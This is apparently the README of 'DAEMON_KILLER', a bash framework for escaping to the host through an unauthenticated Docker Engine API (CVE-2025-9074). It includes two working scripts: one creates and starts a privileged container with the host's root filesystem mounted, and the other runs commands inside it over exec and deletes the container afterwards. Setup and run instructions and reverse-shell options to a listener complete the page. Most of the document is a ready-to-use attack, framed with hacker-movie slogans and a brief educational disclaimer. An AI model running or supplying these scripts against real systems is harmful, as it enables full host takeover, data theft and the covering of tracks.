The Cinematic Docker Escape | An API Exploitation Framework
Creator: C0deGhost | Version: 4.4 (Stable) | MITRE T1611
Fsociety Intel Report
This framework weaponizes **CVE-2025-9074**, a critical exposure of the Docker Engine API without authentication. A daemon listening on a plain TCP port (conventionally 2375) with no TLS client authentication is not a bug in the engine itself: the Engine API is a root-equivalent control plane by design, so anyone who can reach it holds administrative control of the daemon and, through it, the host. (The advisory published under CVE-2025-9074 concerns Docker Desktop exposing that same API to its own containers; the attack chain below applies to any unauthenticated listener, wherever it is reachable from.)
The DAEMON_KILLER automates the process of leveraging this access to deploy a privileged container, break out of its isolation, and achieve root-level command execution on the host machine.
The most critical parameter is the Bind Mount. By binding the host's root filesystem (/) to a directory inside the container (e.g., /mnt/host), the container gains unrestricted read/write access to the entire host filesystem. Combined with --privileged mode (all capabilities, no seccomp or AppArmor profile, access to host devices), this leaves no container isolation mechanism standing.
Attack Chain (Simplified):
- Connect to the exposed Docker API endpoint (e.g., `http://<target>:2375`).
- Craft a malicious `config.json` payload specifying a privileged container with a root filesystem bind mount.
- Inject the payload via a `POST` request to `/containers/create`.
- Start the newly created container via a `POST` request to `/containers/{id}/start`.
- Execute a reverse shell or interactive commands within the compromised container, which now has full control over the host filesystem.
Control is an illusion.
- Tactic: Privilege Escalation & Execution
- Technique: Escape to Host
```mermaid
graph TD;
A[<font color=red>Attacker</font>] --> B{Exposed Docker API};
B --> C[1. Craft Malicious JSON];
C --> D{POST /containers/create};
D --> E[<font color=yellow>Privileged Container Created</font>];
E --> F{POST /containers/start};
F --> G[2. Payload Execution];
G --> H[<font color=cyan>Container has Root FS Mount</font>];
H --> I[<font color=red>3. Full Host Takeover</font>];
```
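The create-and-start chain above, written out as an added example that is not code from the DAEMON_KILLER project: only the shell, curl and sed are used, matching the tool's zero-dependency approach. The endpoint is assumed to be supplied in `DOCKER_API` (the `http://<target>:2375` form from the attack chain), and the image `alpine:latest`, the `sleep 3600` keep-alive command and the function names are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example, not code from the DAEMON_KILLER project: the create -> start
# chain against an unauthenticated Docker Engine API using only the shell,
# curl and sed. Assumed: DOCKER_API points at the exposed endpoint
# (e.g. http://<target>:2375); the host root is mounted at /mnt/host.
set -eu

DOCKER_API="${DOCKER_API:-}"

# Body for POST /containers/create: privileged, host "/" bind-mounted at
# /mnt/host, Google DNS for outbound tooling, and a long-lived command so
# the container stays up for later exec calls. The command must not
# contain double quotes, since it is pasted straight into the JSON.
build_create_payload() {  # image command
    cat <<EOF
{
  "Image": "$1",
  "Cmd": ["sh", "-c", "$2"],
  "HostConfig": {
    "Privileged": true,
    "Binds": ["/:/mnt/host"],
    "Dns": ["8.8.8.8"]
  }
}
EOF
}

# Pull the 64-hex "Id" out of a create response; fail if the daemon refused
# (e.g. {"message":"No such image: ..."}) so the caller never starts "".
json_id() {
    id=$(printf '%s' "$1" | sed -n 's/.*"Id"[[:space:]]*:[[:space:]]*"\([0-9a-f]\{64\}\)".*/\1/p')
    [ -n "$id" ] || return 1
    printf '%s\n' "$id"
}

api_post() {  # path [json-body]
    curl -sS -X POST -H 'Content-Type: application/json' \
         --data "${2:-}" "${DOCKER_API}$1"
}

# Full chain: create, extract the ID, start. Prints the container ID.
deploy_privileged_container() {  # image command
    resp=$(api_post /containers/create "$(build_create_payload "$1" "$2")")
    cid=$(json_id "$resp") || { printf 'create failed: %s\n' "$resp" >&2; return 1; }
    api_post "/containers/$cid/start" >/dev/null
    printf '%s\n' "$cid"
}

# Fires only when DOCKER_API is set, so the file can be sourced safely.
if [ -n "$DOCKER_API" ]; then
    cid=$(deploy_privileged_container alpine:latest 'sleep 3600')
    printf 'container %.12s up; host root at /mnt/host\n' "$cid"
fi
```

Before running the chain, `curl -s "$DOCKER_API/version"` confirms that the API answers without credentials. `/containers/create` returns 404 with a `No such image` message when the requested image is not already present on the daemon (it has to be pulled first via `POST /images/create`), which is why `json_id` refuses to hand back an empty ID instead of letting the start call fail confusingly.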
- 🎬 Cinematic UX/UI: Immersive, animated interface inspired by Mr. Robot, turning exploitation into a visual experience.
- 🚀 Dual Exploit Vectors: Choose between a high-power, persistent `bash -i` reverse shell or a lightweight, surgical Alpine-based interactive shell.
- Pure BASH Implementation: Zero dependencies. Runs on any standard Linux attack box with just `bash` and `curl`.
- 👑 Auto-Privileged & Networked: All malicious containers are automatically created with `--privileged` and full internet access (via Google DNS) for post-exploitation tooling.
- 🔬 Real-Time Forensic Verbose Mode: A deep-dive verbose mode that dissects every command, every raw server response, and every extracted artifact in real time.
- 🌐 In-Shell Pivoting: The interactive shell includes a built-in `revshell` command, allowing you to launch secondary shells from your established foothold.
¿Are you a 1 or a 0?
Fsociety Operation Manual
```bash
git clone https://github.com/fsoc-ghost-0x/CVE-2025-9074_DAEMON_KILLER.git
cd CVE-2025-9074_DAEMON_KILLER
chmod +x Fsociety-CVE-2025-9074_v4.4.sh
./Fsociety-CVE-2025-9074_v4.4.sh
```
The framework is fully interactive. Simply execute the script and follow the prompts.
- You will be prompted for the Target IP and Port.
- You will then select your Exploit Vector ([1] or [2]).
- Based on your choice, you will configure your listener details (`LHOST`/`LPORT`) or activate verbose mode.
Proof of Concept Gallery
Clean, interactive, and thematic user interface for target configuration and vector selection.
Cinematic execution of the heavy payload, followed by a root shell on the listener.
Activating the Alpine-based interactive shell and using the info command to perform reconnaissance on the container's configuration.
Using the built-in revshell command from within the interactive shell to launch a secondary reverse shell to another listener.
Command Line Interface
The primary modes of operation, selected at runtime.
| Option | Vector Name | Description |
|---|---|---|
| [1] | Classic Reverse Shell | Deploys a container using a heavy-payload image (docker_setup-nginx-php) to establish a persistent `bash -i` reverse shell. Ideal for direct control. |
| [2] | Interactive Shell | Deploys a lightweight Alpine container for stealth operations. Provides a pseudo-interactive shell via API exec commands. Ideal for surgical tasks and pivoting. |
Commands available only within the Vector 2 Interactive Shell.
| Command | Syntax | Description |
|---|---|---|
| info | `info` | Displays a detailed intelligence dashboard of the current container, including mount points, network settings, and privilege status. |
| revshell | `revshell` | Launches a secondary nc reverse shell from the container to a specified listener. Perfect for pivoting or handing off access. |
| exit | `exit` | Kills and deletes the malicious container, wiping the primary artifacts from the Docker daemon. |
| | `<linux_command>` | Any other input is executed as a standard Linux command inside the container (e.g., `ls -la /mnt/host/etc`). |
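The exec-based pseudo-interactive shell that Vector 2 describes, together with the `info` and `exit` commands from the table above, as an added example that is not the project's own code. It assumes `DOCKER_API` is set to the exposed endpoint and that the ID of an already running container is passed as the script's single argument; the function names are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example, not code from the DAEMON_KILLER project: an exec-based
# pseudo-interactive shell over the Docker Engine API. Assumed: DOCKER_API
# points at the exposed daemon; $1 is the ID of a running container.
set -eu

DOCKER_API="${DOCKER_API:-}"

api() {  # method path [json-body]
    if [ "$#" -ge 3 ]; then
        curl -sS -X "$1" -H 'Content-Type: application/json' --data "$3" "${DOCKER_API}$2"
    else
        curl -sS -X "$1" "${DOCKER_API}$2"
    fi
}

# Minimal JSON string quoting for a command: escape backslash and quote.
json_string() {
    printf '"%s"' "$(printf '%s' "$1" | sed 's/\\/\\\\/g; s/"/\\"/g')"
}

# Body for POST /containers/{id}/exec. Tty:true makes the daemon return raw
# output instead of the 8-byte-framed stdout/stderr multiplex.
build_exec_payload() {  # command
    printf '{"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["sh","-c",%s]}\n' \
        "$(json_string "$1")"
}

# Pull the 64-hex "Id" out of a create/exec response; fail if absent.
json_id() {
    id=$(printf '%s' "$1" | sed -n 's/.*"Id"[[:space:]]*:[[:space:]]*"\([0-9a-f]\{64\}\)".*/\1/p')
    [ -n "$id" ] || return 1
    printf '%s\n' "$id"
}

# Run one command in the container and print its output: create the exec
# instance, then start it attached.
exec_in_container() {  # cid command
    eid=$(json_id "$(api POST "/containers/$1/exec" "$(build_exec_payload "$2")")")
    api POST "/exec/$eid/start" '{"Detach":false,"Tty":true}'
}

# "info": summarise privilege state from the GET /containers/{id}/json body.
inspect_summary() {  # inspect-json
    printf 'privileged=%s binds=%s\n' \
        "$(printf '%s' "$1" | sed -n 's/.*"Privileged":\([a-z]*\).*/\1/p')" \
        "$(printf '%s' "$1" | sed -n 's/.*"Binds":\[\([^]]*\)].*/\1/p')"
}

# "exit": kill and remove the container so the primary artifact is gone.
cleanup_container() {  # cid
    api DELETE "/containers/$1?force=true" >/dev/null
}

# REPL, entered only when a container ID is given on the command line.
if [ "$#" -eq 1 ]; then
    CID=$1
    while printf 'daemon@%.12s> ' "$CID"; read -r line; do
        case $line in
            info) inspect_summary "$(api GET "/containers/$CID/json")" ;;
            exit) cleanup_container "$CID"; break ;;
            *)    exec_in_container "$CID" "$line" ;;
        esac
    done
fi
```

Each command is a fresh exec instance, so there is no working directory or environment carried between lines; that is what makes the shell "pseudo-interactive". With `Tty` set to false the daemon would instead multiplex stdout and stderr into 8-byte-headed frames that a pure-shell consumer would have to strip; `Tty:true` returns raw bytes at the cost of merging the two streams.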
This tool is intended for educational purposes, security research, and authorized penetration testing engagements only. The author and Fsociety are not responsible for any misuse or damage caused by this program. Use this tool ethically and responsibly.
Those at the top don't like people with my powers.
WE ARE FSOCIETY. WE ARE FINALLY FREE. WE ARE FINALLY AWAKE.